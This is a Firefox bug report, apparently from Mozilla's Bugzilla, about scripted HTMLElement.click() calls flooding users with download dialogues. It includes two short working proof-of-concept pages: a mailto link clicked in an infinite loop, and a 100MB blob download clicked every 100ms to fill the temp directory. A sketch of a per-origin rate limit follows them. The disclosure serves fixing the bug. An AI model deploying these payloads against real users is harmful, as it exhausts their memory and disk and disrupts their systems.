Open Bug 1229873 Opened 9 years ago Updated 2 years ago

HTMLElement.click() spam download dialogue (DoS)

Categories

(Firefox :: Downloads Panel, defect)

42 Branch
defect

People

(Reporter: qab, Unassigned)

Attachments

(1 file)

User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Steps to reproduce: http://jsfiddle.net/6qdogb1p/
Actual results: Download dialogues are spammed indefinitely (or until memory runs out ofc)
Expected results: Some sort of protection to limit download requests to ~5 attempts
Or just fix the .click() function to not be spammed multiple times
tested on FF v42.0 on Windows 8.1
Confirmed 20151029151421 Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0
Setting to New - Firefox: Download Panel - while I don't think this is the root cause, it is a start to have someone assist me in correctly setting the Product/Component. Thanks, Michelle
Status: UNCONFIRMED → NEW
Component: Untriaged → Downloads Panel
Ever confirmed: true
P.S. this bug could be used to spam default mail program, might lead to some ugliness. PoC:
<a href='mailto:@qab' id='q'>q</a>
<script>
while(true){q.click()};
</script>

I noticed the same and wanted to append that this can also be used to fill up the temp directory (e.g. with a 100MB blob), because the download starts before confirmation:

<!DOCTYPE html>
<html>
<body>
    <a download="im-a-file.txt" href='#' id="link">Download</a>
    <div id="counter">0</div>
    <script>
        value = "-".repeat(1024 * 1024)
        let blob = new Blob(Array(100).fill(value), { type: 'text/plain' });
        let link = document.getElementById('link');
        link.href = URL.createObjectURL(blob);
        window.setInterval(function () {
            link.click();
            document.getElementById("counter").textContent++;
        }, 100)
    </script>
</body>
</html>
Attached file download-popups.html (deleted)
Severity: normal → S3
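
The limit asked for under "Expected results", sketched as an added example (not part of the bug thread and not Firefox code): a per-origin gate that allows at most five download prompts without a real user gesture and counts the rest instead of showing them. The class and method names are hypothetical, and letting a genuine user gesture refill the budget is an assumption.

```javascript
// Added example: a hypothetical per-origin gate for download prompts.
// DownloadPromptGate, request and suppressedFor are illustrative names,
// not Firefox APIs.
class DownloadPromptGate {
  constructor(maxWithoutGesture = 5) {
    this.max = maxWithoutGesture; // the "~5 attempts" budget from the report
    this.state = new Map();       // origin -> { used, suppressed }
  }

  // Meant to be called before any dialog is shown and before any bytes reach
  // the temp directory. `userActivated` is true only for a real user gesture,
  // not for a script-driven HTMLElement.click().
  request(origin, userActivated) {
    let s = this.state.get(origin);
    if (!s) {
      s = { used: 0, suppressed: 0 };
      this.state.set(origin, s);
    }
    if (userActivated) {
      // Assumption: a genuine gesture refills the budget and is honoured.
      s.used = 0;
      s.suppressed = 0;
      return "prompt";
    }
    if (s.used < this.max) {
      s.used += 1;
      return "prompt";
    }
    // Over budget: drop the request and count it, so the UI can show one
    // "this site tried to start N more downloads" notice instead of N dialogs.
    s.suppressed += 1;
    return "blocked";
  }

  suppressedFor(origin) {
    const s = this.state.get(origin);
    return s ? s.suppressed : 0;
  }
}

// Constructed input: n scripted clicks from one origin, as in the report's loop.
function simulateScriptedClicks(gate, origin, n) {
  let prompts = 0;
  for (let i = 0; i < n; i++) {
    if (gate.request(origin, false) === "prompt") prompts += 1;
  }
  return prompts;
}
```

Because the decision is made per origin and before the download starts, the same gate covers both the dialog flood and the temp-directory fill described in the later comment.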